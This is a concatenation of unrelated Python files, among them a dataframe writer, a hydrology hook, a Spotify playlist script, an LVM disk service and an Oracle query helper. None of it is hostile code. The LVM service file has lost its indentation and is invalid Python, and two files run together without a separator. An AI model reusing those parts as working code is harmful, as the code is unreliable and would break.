        # a mutable class attribute shared (and re-populated) by every
        # accessor instance.
        self.__writers: dict = {}
        self.__configure_writer_methods()
        self.__configure_catalog()

    def __configure_catalog(self) -> None:
        """Constructor helper that calls the factory to create the catalog
        instance described in the configuration file."""
        # When a configuration already exists, load it
        with open(self.__configuration_path, 'r') as stream:
            registry_configuration = yaml.safe_load(stream)['configurations']['catalog']

        # Load the configuration
        self.__catalog = pf.create(key=registry_configuration['type'],
                                   configuration=registry_configuration['conf'])

    def __configure_writer_methods(self):
        """Constructor helper that populates the registry of allowed writer
        methods (keyed by lower-case format name, e.g. 'csv', 'pickle')."""
        # ----------- create local registry of all writers ---------- #
        # Load configuration
        with open(self.__configuration_path, 'r') as config_stream:
            configuration = yaml.safe_load(stream=config_stream)['configurations']

        # Only formats explicitly allowed by the configuration are exposed.
        for key, value in configuration['writers'].items():
            if value['conf']['allowed']:
                self.__writers[key.lower()] = pf.create(key=value['type'].lower(),
                                                        library='dataframez',
                                                        configuration=value['conf']).write

    def to_csv(self,
               register_as: str,
               sep=',',
               na_rep='',
               float_format=None,
               columns=None,
               header=True,
               index=True,
               index_label=None,
               mode='w',
               encoding=None,
               compression='infer',
               quoting=None,
               quotechar='"',
               line_terminator=None,
               chunksize=None,
               date_format=None,
               doublequote=True,
               escapechar=None,
               decimal='.',
               errors='strict') -> None:
        """
        Write CSV to persistence layer dictated by configuration and asset name.

        All keyword parameters mirror :meth:`pandas.DataFrame.to_csv` and are
        forwarded to the configured writer unchanged.

        Args:
            register_as: Name of asset in catalog.

        Raises:
            PermissionError: if the 'csv' writer is not allowed by the
                current configuration.
        """
        if 'csv' not in self.__writers:
            raise PermissionError('to_csv not supported with the current configuration. Please check your configuration or speak to your system administrator '
                                  'if you believe that this is may be in error.')
        self.__writers['csv'](_df=self._df, entry_name=register_as, **{'sep': sep,
                                                                       'na_rep': na_rep,
                                                                       'float_format': float_format,
                                                                       'columns': columns,
                                                                       'header': header,
                                                                       'index': index,
                                                                       'index_label': index_label,
                                                                       'mode': mode,
                                                                       'encoding': encoding,
                                                                       'compression': compression,
                                                                       'quoting': quoting,
                                                                       'quotechar': quotechar,
                                                                       'line_terminator': line_terminator,
                                                                       'chunksize': chunksize,
                                                                       'date_format': date_format,
                                                                       'doublequote': doublequote,
                                                                       'escapechar': escapechar,
                                                                       'decimal': decimal,
                                                                       'errors': errors})

    def to_pickle(self, register_as: str, compression: str = 'infer', protocol: int = -1) -> None:
        """
        Write Pickle to persistence layer dictated by configuration and asset name.

        Args:
            register_as: Name of asset in catalog.
            compression: forwarded to the configured pickle writer.
            protocol: pickle protocol version, forwarded to the writer.

        Raises:
            PermissionError: if the 'pickle' writer is not allowed by the
                current configuration.
        """
        # FIX: this guard used to test for the 'parquet' writer (and report
        # "to_parquet"), so pickle permissions were never actually enforced.
        if 'pickle' not in self.__writers:
            raise PermissionError('to_pickle not supported with the current configuration. Please check your configuration or speak to your system '
                                  'administrator if you believe that this is may be in error.')
        self.__writers['pickle'](_df=self._df, entry_name=register_as, **{'compression': compression,
                                                                          'protocol': protocol})

    def to_parquet(self, register_as: str, engine='auto', compression='snappy', index=None, **kwargs):
        """
        Write Parquet to persistence layer dictated by configuration and asset name.

        Args:
            register_as: Name of asset in catalog.
            engine: forwarded to the configured parquet writer.
            compression: forwarded to the configured parquet writer.
            index: forwarded to the configured parquet writer.
            **kwargs: any additional writer-specific options.

        Raises:
            PermissionError: if the 'parquet' writer is not allowed by the
                current configuration.
        """
        if 'parquet' not in self.__writers:
            raise PermissionError('to_parquet not supported with the current configuration. Please check your configuration or speak to your system '
                                  'administrator if you believe that this is may be in error.')
        self.__writers['parquet'](_df=self._df, entry_name=register_as, **{'compression': compression,
                                                                           'engine': engine,
                                                                           'index': index,
                                                                           **kwargs})
|
import os
import shutil
from wmt.config import site
from wmt.models.submissions import prepend_to_path
from wmt.utils.hook import find_simulation_input_file
from topoflow_utils.hook import choices_map
# Input files shared by all TopoFlow components of this kind; optional
# entries are skipped per-run inside execute().
file_list = ['rti_file',
             'DEM_file',
             'H0_file',
             'pixel_file']


def execute(env):
    """Perform pre-stage tasks for running a component.

    Parameters
    ----------
    env : dict
        A dict of component parameter values from WMT. Mutated in place.
    """
    env['n_steps'] = int(round(float(env['run_duration']) / float(env['dt'])))
    env['save_grid_dt'] = float(env['dt'])
    env['save_pixels_dt'] = float(env['dt'])

    # TopoFlow needs site_prefix and case_prefix.
    env['site_prefix'] = os.path.splitext(env['rti_file'])[0]
    env['case_prefix'] = 'WMT'

    # FIX: work on a copy of the module-level list. The original called
    # file_list.remove(...) on the global, so a second invocation of
    # execute() raised ValueError (or silently skipped staging files).
    files = list(file_list)

    # If no pixel_file is given, let TopoFlow make one.
    if env['pixel_file'] == 'off':
        files.remove('pixel_file')
        env['pixel_file'] = env['case_prefix'] + '_outlets.txt'
    # Likewise, 'off' for H0 means no initial-depth grid is staged.
    if env['H0_file'] == 'off':
        files.remove('H0_file')
        env['H0_file'] = 'None'

    # Map WMT choice strings to TopoFlow toggle values.
    env['VARIABLE_DT_TOGGLE'] = choices_map[env['VARIABLE_DT_TOGGLE']]
    env['INIT_COND_TOGGLE'] = choices_map[env['INIT_COND_TOGGLE']]
    env['GENERIC_ICE_TOGGLE'] = choices_map[env['GENERIC_ICE_TOGGLE']]
    env['ICEFLOW_TOGGLE'] = choices_map[env['ICEFLOW_TOGGLE']]
    env['ICESLIDE_TOGGLE'] = choices_map[env['ICESLIDE_TOGGLE']]
    env['FREEZE_ON_TOGGLE'] = choices_map[env['FREEZE_ON_TOGGLE']]

    # Default files common to all TopoFlow components are stored with the
    # topoflow component metadata.
    prepend_to_path('WMT_INPUT_FILE_PATH',
                    os.path.join(site['db'], 'components', 'topoflow', 'files'))
    # Stage each required input file into the current working directory.
    for fname in files:
        src = find_simulation_input_file(env[fname])
        shutil.copy(src, os.curdir)
|
import heapq
class Solution:
    # @param A : integer (number of time units available)
    # @param B : list of integers (chocolates in each bag)
    # @return an integer (max chocolates eaten, modulo 1e9+7)
    def nchoc(self, A, B):
        """Greedily eat the fullest bag each step; half of it (rounded down)
        is refilled.

        Python's heapq is a min-heap, so values are stored negated to get
        max-heap behaviour, converting back and forth on push/pop.
        """
        heap = [-num for num in B]
        heapq.heapify(heap)
        total = 0
        for time in range(A):
            if not heap:
                # if all the chocolates are already gone, or were never
                # there, no more time needed
                break
            candies = -heapq.heappop(heap)
            total += candies
            # FIX: floor division. The original used true division, which
            # produced float bag sizes and a float result from the final
            # modulo; the problem is defined over integers.
            heapq.heappush(heap, -(candies // 2))
        return total % 1000000007
|
from _collections import defaultdict
def total_price_fn(price_product, quantity_product):
    """Return the cost of quantity_product items priced at price_product each."""
    return price_product * quantity_product
# name -> [latest_price, accumulated_quantity]
products = defaultdict(list)
# Read "<name> <price> <quantity>" lines until the terminator "buy".
while True:
    command = input()
    if command == "buy":
        break
    name, price, quantity = command.split()
    if name not in products.keys():
        # First sighting of the product: store [price, quantity].
        products[name].append(float(price))
        products[name].append(int(quantity))
    else:
        # Repeat sighting: the newest price wins, quantities accumulate.
        products[name][0] = float(price)
        products[name][1] += int(quantity)
# Report each product's total (price * quantity) with 2 decimal places.
for product, price_quantity in products.items():
    # total_price_fn = lambda price, quantity: price * quantity
    # total_price = total_price_fn(price_quantity[0], price_quantity[1])
    print(f"{product} -> {total_price_fn(price_quantity[0], price_quantity[1]):.2f}")
|
# -*- coding: utf-8 -*-
# Build (or refill) a Spotify playlist from a "Title - Artist" text file.
import spotipy
import sys
import datetime
import keys as keys
from spotipy.oauth2 import SpotifyClientCredentials
# App-level (client-credentials) handle; the playlist edits below use the
# user-authorized token instead.
client_credentials_manager = SpotifyClientCredentials(client_id=keys.client_id,
                                                      client_secret=keys.client_secret)
spotify = spotipy.Spotify(
    client_credentials_manager=client_credentials_manager)
username = keys.spot_username  # your username (not an email address)
createnewplaylist = True  # Set this to true to create a new playlist with the name below; set this to false to use an already created playlist, and follow instructions below
newplaylistname = 'Top'
date = str(datetime.datetime.today().strftime('%m-%d-%y'))
# NOTE(review): there is no space between the date and 'beep boop' in the
# generated description -- presumably unintentional; confirm before changing.
description = 'Automatically generated ' + date + 'beep boop'
# If using an already existing playlist, go to Spotify and right click on a playlist and select "Copy Spotify URI". Paste the value below, keeping only the numbers at the end of the URI
oldplaylistID = '3uEcg6o2uf2ijoyeRj3zLiF'
dataFile = "output.txt"
delim = ' - '  # charecters between song title and artist in your data file; make sure this is not something that could be present in the song title or artist name
my_client_id = keys.client_id
my_client_secret = keys.client_secret
######
######
# NOTE(review): sys and spotipy are imported a second time here (harmless,
# but redundant).
import sys
import spotipy
import spotipy.util as util
import requests
scope = 'user-library-read playlist-modify-public playlist-modify-private'
data = open(dataFile).readlines()
#period = open(dataFile).readline().rstrip()
#print(period)
# Interactive OAuth flow: opens a browser for user consent if needed.
token = util.prompt_for_user_token(username, scope, client_id=my_client_id,
                                   client_secret=my_client_secret, redirect_uri='http://localhost:8888/callback')
myAuth = "Bearer " + token
notfound = []  # NOTE(review): never populated/used below
b = 0  # count of tracks successfully added
if token:
    sp = spotipy.Spotify(auth=token)
    if createnewplaylist:
        r = sp.user_playlist_create(username, newplaylistname, False, description)
        playlistID = r['id']
        sp.user_playlist_change_details(username, playlistID, newplaylistname, False, False, description)
        #sp.user_playlist_change_details(username, playlistID, newplaylistname, description)
        #sp.user_playlist_change_details(username, playlistID, name=newplaylistname, public=None, collaborative=None, description=description)
    else:
        playlistID = oldplaylistID
    for line in data:
        l = line.split(delim)
        # If you have any characters after your track title before your delimiter, add [:-1] (where 1 is equal to the number of additional characters)
        trackTitle = l[0]
        # [:-1] removes the newline at the end of every line. Make this [:-2] if you also have a space at the end of each line
        artist = l[1][:-1]
        #art = artist.replace('e','e')
        #trk = trackTitle.replace('®','')
        art = artist
        trk = trackTitle
        # Search "artist title" and add only the first hit to the playlist.
        q = '{} {}'.format(art, trk)
        r = sp.search(q=q)
        a=0
        for track in r['tracks']['items']:
            a+=1
            b+=1
            # NOTE(review): 'artists' is computed but never used.
            artists =[r['tracks']['items'][0]['name']]
            track_id = [r['tracks']['items'][0]['uri']]
            sp.user_playlist_add_tracks(username, playlistID, track_id)
            output = str("Added " + trk + " by " + art)
            print(output)
            if a == 1:
                break
    # Expected playlist size is 30; report any shortfall.
    if b == 30:
        print("Added 30 songs")
    else:
        print("Missing " + str(30-b) + " song(s)")
else:
    print("exit")
|
from django.urls import path
from .views import comment_create_view
# Comment creation endpoint, keyed by the UUID of the post being commented on.
urlpatterns = [
    path('comment/<uuid:post_id>/', comment_create_view, name='new_comments'),
]
#!/usr/bin/env python3
import argparse, pprint, statistics
from collections import defaultdict
import rend
import HPLResult
# Tuple indices for the (min, max, avg) triples returned by minMaxAvgPerBin.
MMAMin = 0
MMAMax = 1
MMAAvg = 2
def binResultsBy(results, binningFunction):
    """
    Group results into bins keyed by the value a binning function returns.
    :param results: A list of results to bin.
    :param binningFunction: Called on each result to produce its bin key; the
        getters in HPLResult (e.g. HPLResult.getNB to bin by NB) work here.
    :return: A plain dict mapping each bin key to the list of results in it.
    """
    bins = defaultdict(list)  # missing keys transparently become empty lists
    for item in results:
        bins[binningFunction(item)].append(item)
    # Hand back a plain dict -- callers should not grow it by accident.
    return dict(bins)
def minMaxAvgPerBin(binnedResults, statFunction):
    """
    Summarize each bin as (min, max, average) of the values statFunction
    extracts from its members. Index the tuples with MMAMin/MMAMax/MMAAvg.
    :param binnedResults: The binned HPLResults.
    :param statFunction: Maps one HPLResult to a numeric value (typically an
        HPLResult getter).
    :return: Dict of bin key -> (min, max, mean) tuple.
    """
    summary = {}
    for binKey, members in binnedResults.items():
        values = [statFunction(member) for member in members]
        summary[binKey] = (min(values), max(values), statistics.mean(values))
    return summary
def getBestBin(binnedResults, statFunction, lowerIsBetter):
    """
    Pick the bin whose members have the best average statFunction value.
    :param binnedResults: The binned HPLResults.
    :param statFunction: Maps an HPLResult to a comparable value.
    :param lowerIsBetter: True when a smaller average wins (e.g. run time).
    :return: The key of the winning bin.
    """
    averages = minMaxAvgPerBin(binnedResults, statFunction)
    choose = min if lowerIsBetter else max
    # Ties resolve to the first bin in iteration order, matching the
    # behaviour of a stable sort followed by taking element 0.
    return choose(averages, key=lambda binKey: averages[binKey][MMAAvg])
if __name__ == "__main__":
    # Set up argument values
    parser = argparse.ArgumentParser()
    parser.add_argument("input", help = "HPL output file to analyze")
    parser.add_argument("-s", "--statistic", help = "The result property used for finding the best bin on average (required)", choices = HPLResult.GetterCommandLineNames, required = True)
    parser.add_argument("-b", "--bin", help = "The result property used for binning the output (default: null binning function)", choices = HPLResult.NameToGetter.keys())
    parser.add_argument("-o", "--output", help = "Where to output the results, defaults to stdout")
    parser.add_argument("-v", "--verbose", action = "store_true", help = "When used, outputs the results sorted into bins")
    parser.add_argument("-t", "--title", help = "Title for this run")
    args = parser.parse_args()
    # Resolve the selected names to getter functions / display names.
    # NOTE(review): when -b is omitted, binFunc is None and binResultsBy will
    # call None(result) -- presumably -b is effectively required; confirm.
    binFunc = HPLResult.NameToGetter.get(args.bin)
    statFunc = HPLResult.NameToGetter.get(args.statistic)
    binName = HPLResult.NameToDisplayName.get(args.bin)
    statName = HPLResult.NameToDisplayName.get(args.statistic)
    # Process data: parse, bin, summarize, and rank. Lower is better only
    # when ranking by run time.
    binnedResults = binResultsBy(rend.rendData(args.input), binFunc)
    minMaxAvg = minMaxAvgPerBin(binnedResults, statFunc)
    bestBin = getBestBin(binnedResults, statFunc, statFunc == HPLResult.HPLResult.getTime)
    # Write output either to the requested file or to stdout.
    outFile = None
    if args.output: # We have an output file, write to it
        outFile = open(args.output, 'w')
        write = lambda x: outFile.write(str(x) + "\n")
    else: # No output file, write to stdout
        write = lambda x: print(x)
    if args.title:
        write("Results for {}".format(args.title))
    else:
        write("Results for {}".format(args.input))
    if args.verbose:
        write("Arguments to HPLResult are defined as follows:")
        write("Encoded time, N, NB, P, Q, Time, Gigaflops, Start time, End time")
        write("")
    write("Results are binned by {}".format(binName))
    write("")
    if args.verbose:
        write("Binned results")
        write(pprint.pformat(binnedResults))
        write("")
    write("Minimum, maximum, and average {} per bin".format(statName))
    write(pprint.pformat(minMaxAvg))
    write("")
    write("Best bin with respect to {}".format(statName))
    write(bestBin)
    # Clean up the output file if we opened it
    if outFile:
        outFile.close()
        del outFile
|
from torch.utils.data import Dataset
from pathlib import Path
from collections import namedtuple
from PIL import Image
import torch
from torchvision import transforms as T
# from utils import AUG
import numpy as np
Pair = namedtuple('Pair', ['image', 'mask'])
class BaseDataSet(Dataset):
    """Abstract dataset that pairs original samples with their labels.

    Subclasses implement ``_correspond`` (to enumerate file pairs into
    ``self.files``) and ``_load_data`` (to read one pair by index).
    """

    def __init__(self, root):
        """
        Initilize parameters
        root (Path): base root for original data and labeled data.
        """
        self.root = Path(root)
        self.files = []
        self._correspond()

    def _correspond(self):
        """
        1. Set original data root and labeled data root.
        2. Fill self.files with namedtuples, each holding the paths of one
           original-data / labeled-data pair.
           file_path = namedtuple('file_path', ['original_path', 'labeled_path'])
        Tips: Must be called before _load_data.
        """
        raise NotImplementedError

    def _load_data(self, index):
        """
        Cooperates with __getitem__; implemented per concrete dataset.
        Returns a pair of one piece of original data and its labeled data,
        read from the stored file paths:
        pair = namedtuple('pair', ['original', 'labeled'])
        """
        raise NotImplementedError

    def __len__(self):
        return len(self.files)

    def __getitem__(self, index):
        """Return the (original, labeled) pair at ``index``.

        Raises IndexError for indices outside [0, len(self)).
        """
        if 0 <= index < len(self):
            return self._load_data(index)
        raise IndexError
"""LVM based local disk management service.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import math
import os
import six
from treadmill import cgroups
from treadmill import cgutils
from treadmill import localdiskutils
from treadmill import logcontext as lc
from treadmill import lvm
from treadmill import subproc
from treadmill import utils
from . import BaseResourceServiceImpl
_LOGGER = logging.getLogger(__name__)
TREADMILL_LV_PREFIX = 'tm-'
def _uniqueid(app_unique_name):
"""Create unique volume name based on unique app name.
"""
_, uniqueid = app_unique_name.rsplit('-', 1)
return TREADMILL_LV_PREFIX + uniqueid
class LocalDiskResourceService(BaseResourceServiceImpl):
"""LocalDisk service implementation.
"""
__slots__ = (
'_block_dev',
'_read_bps',
'_write_bps',
'_read_iops',
'_write_iops',
'_default_read_bps',
'_default_read_iops',
'_default_write_bps',
'_default_write_iops',
'_pending',
'_vg_name',
'_vg_status',
'_volumes',
'_extent_reserved',
)
PAYLOAD_SCHEMA = (
('size', True, str),
)
def __init__(self, block_dev, vg_name,
read_bps, write_bps, read_iops, write_iops,
default_read_bps='20M', default_write_bps='20M',
default_read_iops=100, default_write_iops=100):
super(LocalDiskResourceService, self).__init__()
self._block_dev = block_dev
self._read_bps = read_bps
self._write_bps = write_bps
self._read_iops = read_iops
self._write_iops = write_iops
self._vg_name = vg_name
self._vg_status = {}
self._volumes = {}
self._extent_reserved = 0
self._pending = []
# TODO: temp solution - throttle read/writes to
# 20M/s. In the future, IO will become part
# of app manifest spec and managed by
# scheduler same way as other resources.
# TODO: Added IOps limit as well.
self._default_read_bps = default_read_bps
self._default_write_bps = default_write_bps
self._default_read_iops = default_read_iops
self._default_write_iops = default_write_iops
def initialize(self, service_dir):
super(LocalDiskResourceService, self).initialize(service_dir)
# Make sure LVM Volume Group set up
localdiskutils.setup_device_lvm(self._block_dev, self._vg_name)
# Finally retrieve the LV info
lvs_info = lvm.lvsdisplay(group=self._vg_name)
# Mark all retrived volumes that were created by treadmill as 'stale'
for lv in lvs_info:
lv['stale'] = lv['name'].startswith(TREADMILL_LV_PREFIX)
if lv['open_count']:
_LOGGER.warning('Logical volume in use: %r', lv['block_dev'])
# Count the number of extents taken by non-treadmill volumes
self._extent_reserved = sum([
lv['extent_size'] for lv in lvs_info if not lv['stale']
])
volumes = {
lv['name']: {
k: lv[k]
for k in [
'name', 'block_dev',
'dev_major', 'dev_minor',
'extent_size',
'stale',
]
}
for lv in lvs_info
}
self._volumes = volumes
self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
def synchronize(self):
"""Make sure that all stale volumes are removed.
"""
modified = False
for uniqueid in six.viewkeys(self._volumes.copy()):
if self._volumes[uniqueid].pop('stale', False):
modified = True
# This is a stale volume, destroy it.
self._destroy_volume(uniqueid)
if not modified:
return
# Now that we successfully removed a volume, retry all the pending
# resources.
for pending_id in self._pending:
self.retry_request(pending_id)
self._pending = []
# We just destroyed a volume, refresh cached status from LVM and notify
# the service of the availability of the new status.
self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
def report_status(self):
status = self._vg_status.copy()
extent_avail = status['extent_nb'] - self._extent_reserved
status['size'] = extent_avail * status['extent_size']
status.update({
'read_bps': self._read_bps,
'write_bps': self._write_bps,
'read_iops': self._read_iops,
'write_iops': self._write_iops
})
return status
    def on_create_request(self, rsrc_id, rsrc_data):
        """Provision a logical volume for a container and set blkio limits.

        :param rsrc_id: Application unique name (also derives the LV id).
        :param rsrc_data: Request payload; 'size' is a human readable size.
        :returns: Volume description dict, or ``None`` when the request is
            delayed until enough extents are freed by a future delete.
        """
        app_unique_name = rsrc_id
        size = rsrc_data['size']
        # Throttling currently always uses the service-wide defaults.
        read_bps = self._default_read_bps
        write_bps = self._default_write_bps
        read_iops = self._default_read_iops
        write_iops = self._default_write_iops
        with lc.LogContext(_LOGGER, rsrc_id,
                           adapter_cls=lc.ContainerAdapter) as log:
            log.info('Processing request')
            size_in_bytes = utils.size_to_bytes(size)
            uniqueid = _uniqueid(app_unique_name)
            # Create the logical volume
            existing_volume = uniqueid in self._volumes
            if not existing_volume:
                needed = math.ceil(
                    size_in_bytes / self._vg_status['extent_size']
                )
                if needed > self._vg_status['extent_free']:
                    # If we do not have enough space, delay the creation until
                    # another volume is deleted.
                    log.info(
                        'Delaying request %r until %d extents are free.'
                        ' Current volumes: %r',
                        rsrc_id, needed, self._volumes)
                    self._pending.append(rsrc_id)
                    return None
                lvm.lvcreate(
                    volume=uniqueid,
                    group=self._vg_name,
                    size_in_bytes=size_in_bytes,
                )
                # We just created a volume, refresh cached status from LVM
                self._vg_status = localdiskutils.refresh_vg_status(
                    self._vg_name
                )
            lv_info = lvm.lvdisplay(
                volume=uniqueid,
                group=self._vg_name
            )
            # Configure block device using cgroups (this is idempotent)
            # FIXME(boysson): The unique id <-> cgroup relation should be
            #                 captured in the cgroup module.
            cgrp = os.path.join('treadmill', 'apps', app_unique_name)
            cgutils.create('blkio', cgrp)
            major, minor = lv_info['dev_major'], lv_info['dev_minor']
            cgroups.set_value(
                'blkio', cgrp,
                'blkio.throttle.write_bps_device',
                '{major}:{minor} {bps}'.format(
                    major=major,
                    minor=minor,
                    bps=utils.size_to_bytes(write_bps),
                )
            )
            cgroups.set_value(
                'blkio', cgrp,
                'blkio.throttle.read_bps_device',
                '{major}:{minor} {bps}'.format(
                    major=major,
                    minor=minor,
                    bps=utils.size_to_bytes(read_bps),
                )
            )
            cgroups.set_value(
                'blkio', cgrp,
                'blkio.throttle.write_iops_device',
                '{major}:{minor} {iops}'.format(
                    major=major,
                    minor=minor,
                    iops=write_iops
                )
            )
            cgroups.set_value(
                'blkio', cgrp,
                'blkio.throttle.read_iops_device',
                '{major}:{minor} {iops}'.format(
                    major=major,
                    minor=minor,
                    iops=read_iops
                )
            )
            volume_data = {
                k: lv_info[k]
                for k in ['name', 'block_dev',
                          'dev_major', 'dev_minor', 'extent_size']
            }
            # Record existence of the volume.
            self._volumes[lv_info['name']] = volume_data
            return volume_data
    def on_delete_request(self, rsrc_id):
        """Destroy the volume backing *rsrc_id* and retry pending requests.

        :returns: ``True`` on success, ``None`` when the volume was unknown
            to LVM (nothing to do).
        """
        app_unique_name = rsrc_id
        with lc.LogContext(_LOGGER, rsrc_id):
            uniqueid = _uniqueid(app_unique_name)
            # Remove it from state (if present)
            if not self._destroy_volume(uniqueid):
                return
            # Now that we successfully removed a volume, retry all the pending
            # resources.
            for pending_id in self._pending:
                self.retry_request(pending_id)
            self._pending = []
            # We just destroyed a volume, refresh cached status from LVM and
            # notify the service of the availability of the new status.
            self._vg_status = localdiskutils.refresh_vg_status(self._vg_name)
        return True
def _destroy_volume(self, uniqueid):
"""Try destroy a volume from LVM.
"""
# Remove it from state (if present)
self._volumes.pop(uniqueid, None)
try:
lvm.lvdisplay(uniqueid, group=self._vg_name)
except subproc.CalledProcessError:
_LOGGER.warning('Ignoring unknow volume %r', uniqueid)
return False
# This should not fail.
lvm.lvremove(uniqueid, group=self._vg_name)
_LOGGER.info('Destroyed volume %r', uniqueid)
return True
|
#!/usr/bin/env python
# ex: set shiftwidth=4 tabstop=4 expandtab:
import subprocess
def get_temp():
    """Return the Raspberry Pi's CPU temperature in Fahrenheit.

    Falls back to an explanatory string when the vcgencmd tool is missing,
    fails, or produces unparseable output.
    """
    cmd = '/opt/vc/bin/vcgencmd measure_temp'
    try:
        # vcgencmd prints e.g. "temp=42.8'C"; run_cmd leaves "42.8'C".
        output = run_cmd(cmd)
        cel = output.split("'")[0]
        flt_cel = float(cel)
        temp = ((flt_cel * 9) / 5) + 32
    except (OSError, subprocess.CalledProcessError, ValueError, IndexError):
        # Narrowed from a bare 'except' so programming errors still surface.
        temp = 'Could not determine CPU temperature'
    return temp
def run_cmd(cmd):
    """Run *cmd* (whitespace-split) and return the text after the first '='.

    Fix: ``subprocess.check_output`` returns ``bytes`` on Python 3, so the
    output must be decoded before the ``str`` operations (the original
    crashed with ``TypeError`` on ``split('=')``).
    """
    output = subprocess.check_output(cmd.split())
    return output.decode().strip().split('=')[1]
def main():
    """Print the CPU temperature (or an error message) to stdout."""
    temperature = get_temp()
    print(temperature)


if __name__ == '__main__':
    main()
|
import unittest
from katas.kyu_6.custom_array_filters import MyList
class MyListTestCase(unittest.TestCase):
    """Exercise MyList's filtering helpers on small samples."""

    def setUp(self):
        # Fresh base list for every test method.
        self.sample = MyList([1, 2, 3, 4, 5])

    def test_equal_1(self):
        self.assertEqual(self.sample.even(), [2, 4])

    def test_equal_2(self):
        self.assertEqual(self.sample.odd(), [1, 3, 5])

    def test_equal_3(self):
        self.assertEqual(self.sample.under(4), [1, 2, 3])

    def test_equal_4(self):
        self.assertEqual(self.sample.over(4), [5])

    def test_equal_5(self):
        self.assertEqual(self.sample.in_range(1, 3), [1, 2, 3])

    def test_equal_6(self):
        evens = MyList([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]).even()
        self.assertEqual(MyList(evens).under(5), [2, 4])

    def test_equal_7(self):
        mixed = MyList(
            ['a', 1, 'b', 300, 'x', 'q', 63, 122, 181, 'z', 0.83, 0.11]
        )
        self.assertEqual(mixed.even(), [300, 122])
|
import peewee
import peewee_async
from app.settings import DATABASE
# Async PostgreSQL connection shared by the models below; credentials come
# from the application's DATABASE settings dict.
database = peewee_async.PostgresqlDatabase(
    database=DATABASE.get("NAME"),
    user=DATABASE.get("USER"),
    password=DATABASE.get("PASSWORD"),
    host=DATABASE.get("HOST"),
    port=DATABASE.get("PORT"),
)
class Page(peewee.Model):
    """A site page; Block rows reference it via a foreign key."""
    id = peewee.PrimaryKeyField()
    name = peewee.CharField(max_length=255)
    slug = peewee.CharField(max_length=255)

    class Meta:
        database = database
        # NOTE(review): Meta.order_by was dropped in peewee 3.x -- confirm
        # the installed peewee version still honors it.
        order_by = ['name']
class Block(peewee.Model):
    """A content block belonging to a Page, with a simple view counter."""
    id = peewee.PrimaryKeyField()
    name = peewee.CharField(max_length=255)
    url = peewee.CharField(max_length=255)
    page = peewee.ForeignKeyField(Page, backref='blocks')
    views = peewee.IntegerField(default=0, null=True)

    class Meta:
        database = database
        # NOTE(review): Meta.order_by was dropped in peewee 3.x -- confirm
        # the installed peewee version still honors it.
        order_by = ['page']
|
import json
from pathlib import Path
import typer
import pandas as pd
# Metric names looked up in each fold's metrics file; only those actually
# present in the collected DataFrame are reported.
METRICS = ("MCRMSE", "best_validation_loss")
def main(log_dir: str, metrics_name: str = "kaggle_metrics.json"):
    """Print per-fold metrics found under *log_dir*, plus their mean.

    Each subdirectory of *log_dir* is treated as one fold and must contain
    a *metrics_name* JSON file.
    """
    metrics = []
    for path in Path(log_dir).iterdir():
        # Robustness fix: skip stray files (e.g. .DS_Store) -- the
        # original crashed trying to open `file / metrics_name`.
        if not path.is_dir():
            continue
        with open(str(path / metrics_name)) as f:
            curr_metrics = json.load(f)
        curr_metrics["fold"] = path.name
        metrics.append(curr_metrics)
    metrics = pd.DataFrame(metrics)
    for metric_name in METRICS:
        if metric_name in metrics.columns:
            for idx, row in metrics.iterrows():
                value = row[metric_name]
                typer.secho(f"({row.fold}) {metric_name} = {value:.3f}", fg="red")
            mean_value = metrics[metric_name].mean()
            typer.secho(f"{metric_name} = {mean_value:.3f}", fg="green")


if __name__ == "__main__":
    typer.run(main)
|
from django import forms
from .models import DOUGH_CHOICES, Pizza
class PizzaForm(forms.ModelForm):
    """Order form exposing only the dough choice, rendered as radio buttons."""
    # Field override: radio widget with the first dough option preselected.
    dough = forms.ChoiceField(label='Тесто', choices=DOUGH_CHOICES, widget=forms.RadioSelect, initial='0')

    class Meta:
        model = Pizza
        fields = ('dough',)
|
from panda3d.core import Point3
from .BaseBrush import BaseBrush
from .controls.NumericControl import NumericControl
from bsp.leveleditor import LEUtils
import math
class CylinderBrush(BaseBrush):
    """Brush that generates an elliptical cylinder solid inside a bounding box."""

    Name = "Cylinder"

    def __init__(self):
        BaseBrush.__init__(self)
        # User-tunable face count; fewer sides = coarser cylinder.
        self.numSides = self.addControl(NumericControl(self, "Number of sides", val = 8))

    def create(self, generator, mins, maxs, material, roundDecimals, temp = False):
        """Return a list with one cylinder solid fitted to [mins, maxs].

        Returns an empty list when fewer than 3 sides are requested.
        """
        numSides = self.numSides.getValue()
        if numSides < 3:
            return []
        # Cylinders can be elliptical so use both major and minor rather than just the radius
        # NOTE: when a low number (< 10ish) of faces are selected this will cause the cylinder to not touch all edges of the box.
        width = maxs.x - mins.x
        length = maxs.y - mins.y
        height = maxs.z - mins.z
        center = (mins + maxs) / 2
        major = width / 2
        minor = length / 2
        angle = 2 * math.pi / numSides
        # Calculate the X and Y points for the ellipse (bottom ring).
        points = []
        for i in range(numSides):
            a = i * angle
            xval = center.x + major * math.cos(a)
            yval = center.y + minor * math.sin(a)
            zval = mins.z
            points.append(LEUtils.roundVector(Point3(xval, yval, zval), roundDecimals))
        faces = []
        z = LEUtils.roundVector(Point3(0, 0, height), roundDecimals)
        for i in range(numSides):
            # Fix: renamed 'next' -> 'next_i' to stop shadowing the builtin.
            next_i = (i + 1) % numSides
            faces.append([points[i], points[i] + z, points[next_i] + z, points[next_i]])
        # Add the elliptical top and bottom faces
        faces.append(points)
        faces.append([x + z for x in reversed(points)])
        solid = self.makeSolid(generator, faces, material, temp)
        return [solid]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 26 16:34:49 2018
@author: Rajesh Arumugam
"""
# used cx_oracle library
# https://pypi.python.org/pypi/cx_Oracle
# Connect to Oracle DB,retrive data and create csv file
import cx_Oracle
import pandas as pd
# DB connection Details
USERNAME = 'username'
PASSWORD = 'password'
IP = "ipaddress"
PORT = "1521"
service_name="DBSERVICENAME"
# Function in retrive the Values
def dbquery(query):
    """Run *query* against the configured Oracle DB, return a DataFrame.

    Fix: the original printed the DatabaseError and fell through to
    ``return df``, crashing with UnboundLocalError; errors are now
    re-raised after being logged so callers see the real failure.
    """
    # Create Connection using CX_Oracle
    dsn_tns = cx_Oracle.makedsn(IP, PORT, service_name=service_name)
    connection = cx_Oracle.connect(USERNAME, PASSWORD, dsn_tns)
    # Fetch the result set into a pandas DataFrame.
    with connection:
        try:
            df = pd.read_sql_query(query, connection)
